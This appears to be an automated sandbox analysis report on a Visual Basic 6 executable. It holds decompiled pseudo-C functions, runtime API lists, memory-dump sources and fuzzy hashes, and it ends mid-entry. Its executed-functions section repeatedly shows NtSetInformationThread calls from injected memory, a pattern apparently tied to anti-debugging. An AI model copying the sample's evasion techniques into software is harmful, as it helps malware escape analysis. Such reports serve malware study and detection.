            			E0040B974(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				intOrPtr _v16;
            				char _v32;
            				char _v36;
            				char _v52;
            				char _v68;
            				intOrPtr _v92;
            				intOrPtr _v100;
            				intOrPtr _v108;
            				char _v116;
            				void* _v120;
            				signed int _v124;
            				intOrPtr* _v136;
            				signed int _v140;
            				short _t50;
            				signed int _t53;
            				char* _t57;
            				void* _t71;
            				void* _t73;
            				intOrPtr _t74;
            
            				_t74 = _t73 - 0xc;
            				 *[fs:0x0] = _t74;
            				L00401190();
            				_v16 = _t74;
            				_v12 = 0x401138;
            				_v8 = 0;
            				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x74,  *[fs:0x0], 0x401196, _t71);
            				_v92 = 0x401d80;
            				_v100 = 8;
            				L00401298();
            				_push( &_v52);
            				_push( &_v68);
            				L0040122C();
            				_v108 = 0x401d8c;
            				_v116 = 0x8008;
            				_push( &_v68);
            				_t50 =  &_v116;
            				_push(_t50);
            				L004012A4();
            				_v120 = _t50;
            				_push( &_v68);
            				_push( &_v52);
            				_push(2);
            				L00401292();
            				_t53 = _v120;
            				if(_t53 != 0) {
            					if( *0x40d010 != 0) {
            						_v136 = 0x40d010;
            					} else {
            						_push(0x40d010);
            						_push(0x401f3c);
            						L00401286();
            						_v136 = 0x40d010;
            					}
            					_t57 =  &_v36;
            					L0040128C();
            					_v120 = _t57;
            					_t53 =  *((intOrPtr*)( *_v120 + 0x48))(_v120,  &_v32, _t57,  *((intOrPtr*)( *((intOrPtr*)( *_v136)) + 0x310))( *_v136));
            					asm("fclex");
            					_v124 = _t53;
            					if(_v124 >= 0) {
            						_v140 = _v140 & 0x00000000;
            					} else {
            						_push(0x48);
            						_push(0x401d24);
            						_push(_v120);
            						_push(_v124);
            						L00401280();
            						_v140 = _t53;
            					}
            					_push(_v32);
            					L00401226();
            					L00401268();
            					L0040126E();
            				}
            				_push(0x40baed);
            				return _t53;
            			}

            APIs
            • __vbaChkstk.MSVBVM60(?,00401196), ref: 0040B990
            • __vbaVarDup.MSVBVM60 ref: 0040B9C8
            • #522.MSVBVM60(?,?), ref: 0040B9D5
            • __vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?), ref: 0040B9F0
            • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008008,?,?,?,?,?), ref: 0040BA03
            • __vbaNew2.MSVBVM60(00401F3C,0040D010,?,?,00401196), ref: 0040BA2A
            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040BA63
            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00401D24,00000048), ref: 0040BA92
            • #532.MSVBVM60(?), ref: 0040BAA9
            • __vbaFreeStr.MSVBVM60(?), ref: 0040BAB1
            • __vbaFreeObj.MSVBVM60(?), ref: 0040BAB9
            Memory Dump Source
            • Source File: 00000000.00000002.387000118.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.386994693.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.387009124.000000000040D000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.387014972.000000000040F000.00000002.00020000.sdmp
            Similarity
            • API ID: __vba$Free$#522#532CheckChkstkHresultListNew2
            • String ID:
            • API String ID: 332616431-0
            • Opcode ID: 5dc676d7263997f83b46df07cd00d699b3749381a264a904d76474b644ba5810
            • Instruction ID: 8489ff4e9bc30615eab89219f0345df6dc3b8bd47095fd531ee03d58c2f5a424
            • Opcode Fuzzy Hash: 5dc676d7263997f83b46df07cd00d699b3749381a264a904d76474b644ba5810
            • Instruction Fuzzy Hash: FF41E575900218ABCB10EFA1C945BEDBBB8BF08704F2045BEE505BB1A1DB785949CF98
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 46%
            			E0040BB68(void* __ebx, void* __ecx, void* __edi, void* __esi) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				char _v32;
            				char _v36;
            				char _v40;
            				intOrPtr _v48;
            				intOrPtr _v56;
            				intOrPtr* _v60;
            				signed int _v64;
            				intOrPtr* _v68;
            				signed int _v72;
            				intOrPtr* _v80;
            				intOrPtr* _v84;
            				signed int _v88;
            				signed int _v92;
            				char* _t50;
            				char* _t54;
            				signed int _t58;
            				signed int _t62;
            				char* _t64;
            				intOrPtr _t80;
            
            				_push(0x401196);
            				_push( *[fs:0x0]);
            				 *[fs:0x0] = _t80;
            				_push(0x48);
            				L00401190();
            				_v12 = _t80;
            				_v8 = 0x401148;
            				if( *0x40d010 != 0) {
            					_v80 = 0x40d010;
            				} else {
            					_push(0x40d010);
            					_push(0x401f3c);
            					L00401286();
            					_v80 = 0x40d010;
            				}
            				_push( *((intOrPtr*)( *((intOrPtr*)( *_v80)) + 0x310))( *_v80));
            				_t50 =  &_v40;
            				_push(_t50);
            				L0040128C();
            				_v68 = _t50;
            				_v48 = 0x80020004;
            				_v56 = 0xa;
            				if( *0x40d010 != 0) {
            					_v84 = 0x40d010;
            				} else {
            					_push(0x40d010);
            					_push(0x401f3c);
            					L00401286();
            					_v84 = 0x40d010;
            				}
            				_t54 =  &_v36;
            				L0040128C();
            				_v60 = _t54;
            				_t58 =  *((intOrPtr*)( *_v60 + 0x108))(_v60,  &_v32, _t54,  *((intOrPtr*)( *((intOrPtr*)( *_v84)) + 0x2fc))( *_v84));
            				asm("fclex");
            				_v64 = _t58;
            				if(_v64 >= 0) {
            					_v88 = _v88 & 0x00000000;
            				} else {
            					_push(0x108);
            					_push(0x401d14);
            					_push(_v60);
            					_push(_v64);
            					L00401280();
            					_v88 = _t58;
            				}
            				L00401190();
            				asm("movsd");
            				asm("movsd");
            				asm("movsd");
            				asm("movsd");
            				_t62 =  *((intOrPtr*)( *_v68 + 0x1ec))(_v68, _v32, 0x10);
            				asm("fclex");
            				_v72 = _t62;
            				if(_v72 >= 0) {
            					_v92 = _v92 & 0x00000000;
            				} else {
            					_push(0x1ec);
            					_push(0x401d24);
            					_push(_v68);
            					_push(_v72);
            					L00401280();
            					_v92 = _t62;
            				}
            				L00401268();
            				_push( &_v40);
            				_t64 =  &_v36;
            				_push(_t64);
            				_push(2);
            				L00401262();
            				asm("wait");
            				_push(0x40bcf7);
            				return _t64;
            			}

            APIs
            • __vbaChkstk.MSVBVM60(?,00401196), ref: 0040BB83
            • __vbaNew2.MSVBVM60(00401F3C,0040D010,?,?,?,?,00401196), ref: 0040BBA8
            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040BBD5
            • __vbaNew2.MSVBVM60(00401F3C,0040D010,?,00000000), ref: 0040BBFE
            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040BC2B
            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00401D14,00000108), ref: 0040BC60
            • __vbaChkstk.MSVBVM60 ref: 0040BC71
            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00401D24,000001EC), ref: 0040BCAB
            • __vbaFreeStr.MSVBVM60 ref: 0040BCBC
            • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040BCCB
            Memory Dump Source
            • Source File: 00000000.00000002.387000118.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.386994693.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.387009124.000000000040D000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.387014972.000000000040F000.00000002.00020000.sdmp
            Similarity
            • API ID: __vba$CheckChkstkFreeHresultNew2$List
            • String ID:
            • API String ID: 2926503497-0
            • Opcode ID: 6ccf745f441f4c62e9cb566eea96fc10a83fda715399647bfba259104ae6f23f
            • Instruction ID: f8acdf6417d87216822bd523aa2b5652eecaf113733c272d50404b7777641c57
            • Opcode Fuzzy Hash: 6ccf745f441f4c62e9cb566eea96fc10a83fda715399647bfba259104ae6f23f
            • Instruction Fuzzy Hash: 2C41F675D01208EFDB00DFD1C845B9DBBB9FF08708F20446AF501BB2A1CBB969469B98
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 61%
            			E0040BECB(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				intOrPtr _v16;
            				char _v36;
            				char _v40;
            				intOrPtr* _v44;
            				signed int _v48;
            				signed int _v52;
            				intOrPtr* _v64;
            				signed int _v68;
            				signed int _v72;
            				char* _t46;
            				signed int _t50;
            				signed int _t53;
            				void* _t62;
            				void* _t64;
            				intOrPtr _t65;
            
            				_t65 = _t64 - 0xc;
            				 *[fs:0x0] = _t65;
            				L00401190();
            				_v16 = _t65;
            				_v12 = 0x401180;
            				_v8 = 0;
            				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x30,  *[fs:0x0], 0x401196, _t62);
            				if( *0x40d010 != 0) {
            					_v64 = 0x40d010;
            				} else {
            					_push(0x40d010);
            					_push(0x401f3c);
            					L00401286();
            					_v64 = 0x40d010;
            				}
            				_t46 =  &_v40;
            				L0040128C();
            				_v44 = _t46;
            				_t50 =  *((intOrPtr*)( *_v44 + 0x218))(_v44,  &_v36, _t46,  *((intOrPtr*)( *((intOrPtr*)( *_v64)) + 0x310))( *_v64));
            				asm("fclex");
            				_v48 = _t50;
            				if(_v48 >= 0) {
            					_v68 = _v68 & 0x00000000;
            				} else {
            					_push(0x218);
            					_push(0x401d24);
            					_push(_v44);
            					_push(_v48);
            					L00401280();
            					_v68 = _t50;
            				}
            				_t53 =  *((intOrPtr*)( *_a4 + 0x16c))(_a4, _v36);
            				asm("fclex");
            				_v52 = _t53;
            				if(_v52 >= 0) {
            					_v72 = _v72 & 0x00000000;
            				} else {
            					_push(0x16c);
            					_push(0x401b28);
            					_push(_a4);
            					_push(_v52);
            					L00401280();
            					_v72 = _t53;
            				}
            				L00401268();
            				L0040126E();
            				_push(0x40bff1);
            				return _t53;
            			}

            APIs
            • __vbaChkstk.MSVBVM60(?,00401196), ref: 0040BEE7
            • __vbaNew2.MSVBVM60(00401F3C,0040D010,?,?,?,?,00401196), ref: 0040BF1E
            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040BF4B
            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00401D24,00000218), ref: 0040BF80
            • __vbaHresultCheckObj.MSVBVM60(00000000,00401180,00401B28,0000016C), ref: 0040BFBA
            • __vbaFreeStr.MSVBVM60 ref: 0040BFCB
            • __vbaFreeObj.MSVBVM60 ref: 0040BFD3
            Memory Dump Source
            • Source File: 00000000.00000002.387000118.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.386994693.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.387009124.000000000040D000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.387014972.000000000040F000.00000002.00020000.sdmp
            Similarity
            • API ID: __vba$CheckFreeHresult$ChkstkNew2
            • String ID:
            • API String ID: 304406766-0
            • Opcode ID: 8b76add1e6cc67a4afb41162d509ace17342c687416dbd0022a2ae6808e2a5c5
            • Instruction ID: 09efddce18da3363a93375e39524b062fc38ddcdc2b842d6f0712ea7e186b475
            • Opcode Fuzzy Hash: 8b76add1e6cc67a4afb41162d509ace17342c687416dbd0022a2ae6808e2a5c5
            • Instruction Fuzzy Hash: F731CF75941208AFCB04EFA5C849BDDBBB5FF08708F10446AF405BB2A1C7795945DFA8
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 65%
            			E0040BD12(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12, void* _a28) {
            				intOrPtr _v8;
            				intOrPtr _v12;
            				intOrPtr _v16;
            				void* _v40;
            				void* _v56;
            				signed int _v64;
            				signed int _v76;
            				signed int _t30;
            				void* _t40;
            				void* _t42;
            				intOrPtr _t43;
            
            				_t43 = _t42 - 0xc;
            				 *[fs:0x0] = _t43;
            				L00401190();
            				_v16 = _t43;
            				_v12 = 0x401158;
            				_v8 = 0;
            				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x34,  *[fs:0x0], 0x401196, _t40);
            				L00401298();
            				L00401298();
            				_t30 =  *((intOrPtr*)( *_a4 + 0x15c))(_a4, 0);
            				asm("fclex");
            				_v64 = _t30;
            				if(_v64 >= 0) {
            					_v76 = _v76 & 0x00000000;
            				} else {
            					_push(0x15c);
            					_push(0x401b28);
            					_push(_a4);
            					_push(_v64);
            					L00401280();
            					_v76 = _t30;
            				}
            				asm("wait");
            				_push(0x40bdb8);
            				L0040125C();
            				L0040125C();
            				return _t30;
            			}

            APIs
            • __vbaChkstk.MSVBVM60(?,00401196), ref: 0040BD2E
            • __vbaVarDup.MSVBVM60(?,?,?,?,00401196), ref: 0040BD58
            • __vbaVarDup.MSVBVM60(?,?,?,?,00401196), ref: 0040BD63
            • __vbaHresultCheckObj.MSVBVM60(00000000,00401158,00401B28,0000015C), ref: 0040BD93
            • __vbaFreeVar.MSVBVM60(0040BDB8), ref: 0040BDAA
            • __vbaFreeVar.MSVBVM60(0040BDB8), ref: 0040BDB2
            Memory Dump Source
            • Source File: 00000000.00000002.387000118.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.386994693.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.387009124.000000000040D000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.387014972.000000000040F000.00000002.00020000.sdmp
            Similarity
            • API ID: __vba$Free$CheckChkstkHresult
            • String ID:
            • API String ID: 3894782938-0
            • Opcode ID: 728b36b0dd79d8ecde2d05c6e1384df2c79b7d1e3d8b377824d5f07ac8168f96
            • Instruction ID: b362e91c64746a5762c17bcbcc67b144ec7128f3c3d5559dfd5eaf917e70ce5e
            • Opcode Fuzzy Hash: 728b36b0dd79d8ecde2d05c6e1384df2c79b7d1e3d8b377824d5f07ac8168f96
            • Instruction Fuzzy Hash: 2D112530900208EFCB04EF95D886BDDBBB4EF08744F10846AF405BB1A0D7785A45CB88
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 45%
            			E0040B8A1(void* __ebx, void* __edi, void* __esi, signed int* _a24) {
            				intOrPtr _v12;
            				intOrPtr _v16;
            				long long _v48;
            				char _v56;
            				char _v72;
            				intOrPtr _v112;
            				char _v120;
            				short _v124;
            				short _t21;
            				char* _t23;
            				void* _t29;
            				intOrPtr _t30;
            
            				_t30 = _t29 - 0xc;
            				_push(0x401196);
            				_push( *[fs:0x0]);
            				 *[fs:0x0] = _t30;
            				_push(0x6c);
            				L00401190();
            				_v16 = _t30;
            				_v12 = 0x401128;
            				 *_a24 =  *_a24 & 0x00000000;
            				_v48 =  *0x401120;
            				_v56 = 5;
            				_push(0);
            				_push( &_v56);
            				_push( &_v72);
            				L00401232();
            				_v112 = 1;
            				_v120 = 0x8002;
            				_push( &_v72);
            				_t21 =  &_v120;
            				_push(_t21);
            				L004012A4();
            				_v124 = _t21;
            				_push( &_v72);
            				_t23 =  &_v56;
            				_push(_t23);
            				_push(2);
            				L00401292();
            				asm("wait");
            				_push(0x40b957);
            				return _t23;
            			}

            APIs
            • __vbaChkstk.MSVBVM60(?,00401196), ref: 0040B8BD
            • #714.MSVBVM60(?,00000005,00000000), ref: 0040B8EF
            • __vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040B90A
            • __vbaFreeVarList.MSVBVM60(00000002,00000005,?,00008002,?), ref: 0040B91D
            Memory Dump Source
            • Source File: 00000000.00000002.387000118.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.386994693.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000000.00000002.387009124.000000000040D000.00000004.00020000.sdmp
            • Associated: 00000000.00000002.387014972.000000000040F000.00000002.00020000.sdmp
            Similarity
            • API ID: __vba$#714ChkstkFreeList
            • String ID:
            • API String ID: 1770595079-0
            • Opcode ID: 232b6c4612bd13ea03bccc44b9e68eeb1c0772cb3136cd2c495cfd6277c92cb0
            • Instruction ID: 994a1fd8c44cb928e3ce4c07970a7e44f1fb45deb84c65771f40f2052b9fc10a
            • Opcode Fuzzy Hash: 232b6c4612bd13ea03bccc44b9e68eeb1c0772cb3136cd2c495cfd6277c92cb0
            • Instruction Fuzzy Hash: 8B01EDB1C41208AADB01EFD5D946BDEBBBCEB08704F60856BF600BB191D77856148B59
            Uniqueness

            Uniqueness Score: -1.00%

            Executed Functions

            Memory Dump Source
            • Source File: 00000004.00000002.598296245.0000000000FE0000.00000040.00000001.sdmp, Offset: 00FE0000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f3ee76803bddb974596df00f185030d1b22e6205412252664b4bcbbbc844b528
            • Instruction ID: 9e03016953a9d955fbc7f52bf6fd40e21ccb2d2a3cca0b3805f1d49f0079bd23
            • Opcode Fuzzy Hash: f3ee76803bddb974596df00f185030d1b22e6205412252664b4bcbbbc844b528
            • Instruction Fuzzy Hash: C8631C31D1065A8ECB10EF69C9846DDF7B1FF95310F15C69AE458AB221EB30AAC5CF81
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.598296245.0000000000FE0000.00000040.00000001.sdmp, Offset: 00FE0000, based on PE: false
            Similarity
            • API ID:
            • String ID: D0~l
            • API String ID: 0-3839986925
            • Opcode ID: ebe2f0f28afbea664cbd039d8c8e505bb366c92fa28119b59ef05c67f9d1f162
            • Instruction ID: debf28315fefb8d770dcb4aa1bc3ae952ef32c67d9a944027b833f2b80f27d0c
            • Opcode Fuzzy Hash: ebe2f0f28afbea664cbd039d8c8e505bb366c92fa28119b59ef05c67f9d1f162
            • Instruction Fuzzy Hash: 7652BE30B042898FCB24DB75D954B6EBBF2AF89314F1684AAD505EB391DB34EC058792
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.602716873.000000001D980000.00000040.00000001.sdmp, Offset: 1D980000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 53808b128b9b0ac671f1690c302b281fef1e58361a755e02b334f48ebfda6b72
            • Instruction ID: 3429cfb6a7272a12fcb883cfa82598b62832466a96b108d5187f957152e78620
            • Opcode Fuzzy Hash: 53808b128b9b0ac671f1690c302b281fef1e58361a755e02b334f48ebfda6b72
            • Instruction Fuzzy Hash: FCF16F34A00229CFDB05DFA5C984BADBBF1BF88704F15856CD409AF262DB75E945CB82
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.598296245.0000000000FE0000.00000040.00000001.sdmp, Offset: 00FE0000, based on PE: false
            Similarity
            • API ID:
            • String ID: \yl
            • API String ID: 0-1382344034
            • Opcode ID: 8bb95ff16904445b934dc2654d1499ed4ee24b33a284013e5f4dcfc62857c660
            • Instruction ID: 5d5f2cf9c0c51f9fb470d297034063e2484855774d614a497895b98635c9fe2b
            • Opcode Fuzzy Hash: 8bb95ff16904445b934dc2654d1499ed4ee24b33a284013e5f4dcfc62857c660
            • Instruction Fuzzy Hash: D502C674F042499FDB24CBA9C8947ADB7B2AF8A320F15842DE115EF684CB74EC41DB91
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000004.00000002.598296245.0000000000FE0000.00000040.00000001.sdmp, Offset: 00FE0000, based on PE: false
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 66891be6d87763c4319b8a63b789de497ab730280a0d3f0877215969a4661b09
            • Instruction ID: 113d99c5270ad2939f5bc0c2c0d01074c98886dff71cc152a51496b6a9890045
            • Opcode Fuzzy Hash: 66891be6d87763c4319b8a63b789de497ab730280a0d3f0877215969a4661b09
            • Instruction Fuzzy Hash: 2B51A371B002099FCF04EFB4C884AAEB7B5BF89344F148929E516DB391DF70E9448BA5
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.598296245.0000000000FE0000.00000040.00000001.sdmp, Offset: 00FE0000, based on PE: false
            Similarity
            • API ID:
            • String ID: \yl
            • API String ID: 0-1382344034
            • Opcode ID: 9e7f04c36c0197ecc5835ff5687f9bedca10bdbf852d56ce04d88336b6198806
            • Instruction ID: d0ef52e8d86a03fc136929d42e56290f44ab4c9b01a2eb9d992c70890893efb4
            • Opcode Fuzzy Hash: 9e7f04c36c0197ecc5835ff5687f9bedca10bdbf852d56ce04d88336b6198806
            • Instruction Fuzzy Hash: E9E1B674E002499FDB24DBA9C494BADB7B2EF89320F15842DE115EB684CB74FC41DB91
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 236ff1949ec7c2eef685102e95ff76afde1ccfe5f6fb99e85e38c0e103111d57
            • Instruction ID: ae23a8bfb80196aafae4dbeb4798400749d74a0edf243b7a0fc1e8fdcceb9ff0
            • Opcode Fuzzy Hash: 236ff1949ec7c2eef685102e95ff76afde1ccfe5f6fb99e85e38c0e103111d57
            • Instruction Fuzzy Hash: 4A4116F0608A09CEFF2B5929CAB63F526DAAF4135CF54462ACD43878DDE32684E4C641
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: bbc83fa35985e94667aead630b6405afc8823e9c7deeef3aea0fe9b8ccc3a391
            • Instruction ID: 756b8bc33d1c3b2108b07c2e6b751128ed793d6baec9cb516cd7fa1fddca8eec
            • Opcode Fuzzy Hash: bbc83fa35985e94667aead630b6405afc8823e9c7deeef3aea0fe9b8ccc3a391
            • Instruction Fuzzy Hash: F73107F0608A09CEFF2B5A19C9763F422D5AF4135CF55462ACD03878DDD33684E4C641
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: 7d2f7fc577a9afd493eb851cc57215a1791f7aaa5fef8e6eeee54bb27b7893ac
            • Instruction ID: 1205893239c3bf960e59daab77ff25d0b56945d8d33e06b3785bf1d8de08e1c6
            • Opcode Fuzzy Hash: 7d2f7fc577a9afd493eb851cc57215a1791f7aaa5fef8e6eeee54bb27b7893ac
            • Instruction Fuzzy Hash: 9C31E7F0608A09CEFF1B5A19C9B63B432D5AF5132CF55426ACD03874DDD33588E4C651
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: 81cca80d95e2b56e091f8b932a2df094a6d62618ee01e04399ae1577919e4367
            • Instruction ID: 673cede5711cbee2cf19731da5ce5f2fac0420f9ed843291e77b9033089a15df
            • Opcode Fuzzy Hash: 81cca80d95e2b56e091f8b932a2df094a6d62618ee01e04399ae1577919e4367
            • Instruction Fuzzy Hash: E73125E0608A09CEFF2B5A19C9B63B436D9AF4136CF55422ACD03878DDD33284E4C642
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: 2180adc72be92a3315a481a96c37f1279c9d79fec0423352e6b694a8450d255b
            • Instruction ID: 682345a1f656a047dc9f86a6997634b8c001c8c0581d29b6219997754fb4ebc4
            • Opcode Fuzzy Hash: 2180adc72be92a3315a481a96c37f1279c9d79fec0423352e6b694a8450d255b
            • Instruction Fuzzy Hash: 7831F3E0608A09CEFF2B5A19C9B63B936D5AF4136CF54426ACD03874DDD33688E4C642
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: b4c86f53540d087c501ea9faedd641819bc26542b1c9fb4c2c76a1b9194e97c9
            • Instruction ID: 363a96ce85fb1b7846917c6752a90950c9bcea674e1a4d3d7f401875069b71d3
            • Opcode Fuzzy Hash: b4c86f53540d087c501ea9faedd641819bc26542b1c9fb4c2c76a1b9194e97c9
            • Instruction Fuzzy Hash: BA31E6F0608A09CEFF2B5A19C9B63B936D5AF4136CF54526ACD07874DDD33688E4C642
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: db806565088ac2149440e607c60b976b6becc0c03953859b517dfab801d34dfb
            • Instruction ID: 26ffd41d0cc65f137de085be001f348e366076c2b00c1d8a51d319c0279c1de2
            • Opcode Fuzzy Hash: db806565088ac2149440e607c60b976b6becc0c03953859b517dfab801d34dfb
            • Instruction Fuzzy Hash: C721D6F0608A09CEFF2B5A19C9B63B936D6AF4132CF54426ADD07874DDD33684E4C642
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: f530a06f6d7c162ea573bcc71a2e2de97b0944db1278783d768837c8e0a244ed
            • Instruction ID: 9f8e7867c20d9e67e6b6728d508dd4e8184b19d1e5861728a9de9316a8c907e3
            • Opcode Fuzzy Hash: f530a06f6d7c162ea573bcc71a2e2de97b0944db1278783d768837c8e0a244ed
            • Instruction Fuzzy Hash: 9721D3F0608A09CEFF2B9A19C9B63B536D6AF4132CF94426ADD06874DDD33688E4C641
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: a2e4fc16fa61f56d1ca68129ff2203251a8a1ed6a56d1996fda2988b00db8733
            • Instruction ID: 01fabe7aac44af0f822e10a5c4b83a18ddab25ad6cbf77074ce3a9531b6266f0
            • Opcode Fuzzy Hash: a2e4fc16fa61f56d1ca68129ff2203251a8a1ed6a56d1996fda2988b00db8733
            • Instruction Fuzzy Hash: AA21F7F0608A09CEFF2B8A19C9B63B536D6EF4132CF54426ADD06874DDD33688E4C641
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: 0a019983aa1f2aaeec683af853ba952bfda32bbd1f583513157bc1de682b9b93
            • Instruction ID: 213026cf150addaa6c23b420d052d511b8841a44a0338e961711ab909add7915
            • Opcode Fuzzy Hash: 0a019983aa1f2aaeec683af853ba952bfda32bbd1f583513157bc1de682b9b93
            • Instruction Fuzzy Hash: 3C21F8F0608E09CEFF278A29C9B63A536D6EF5132CF94426ACD06874DDD33684E4C641
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: 4788c7cbcd8ae262bb3251e595b2982a3db5f09772e0b22c8b8c78f18f6cae04
            • Instruction ID: 806829435a15c52982ca22dcf4a4e72317767e1858113f29dde2fe612f4a5c58
            • Opcode Fuzzy Hash: 4788c7cbcd8ae262bb3251e595b2982a3db5f09772e0b22c8b8c78f18f6cae04
            • Instruction Fuzzy Hash: EA21D4A0608B09CDFB278A19C6B63B436D6AF5132CF94426ACD06874EDD33684E4C642
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtSetInformationThread.NTDLL ref: 01306CD5
            Memory Dump Source
            • Source File: 00000004.00000002.598459884.0000000001302000.00000040.00000001.sdmp, Offset: 01302000, based on PE: false
            Similarity
            • API ID: InformationThread
            • String ID:
            • API String ID: 4046476035-0
            • Opcode ID: 35e0a0985c711d0c696816a2c18c10d664e27804eac26212dff859e95512f4a4
            • Instruction ID: e2e1df15058cc53f8e6f725f40f1f735ac612133ff42d3c90eecaf958f6284f7
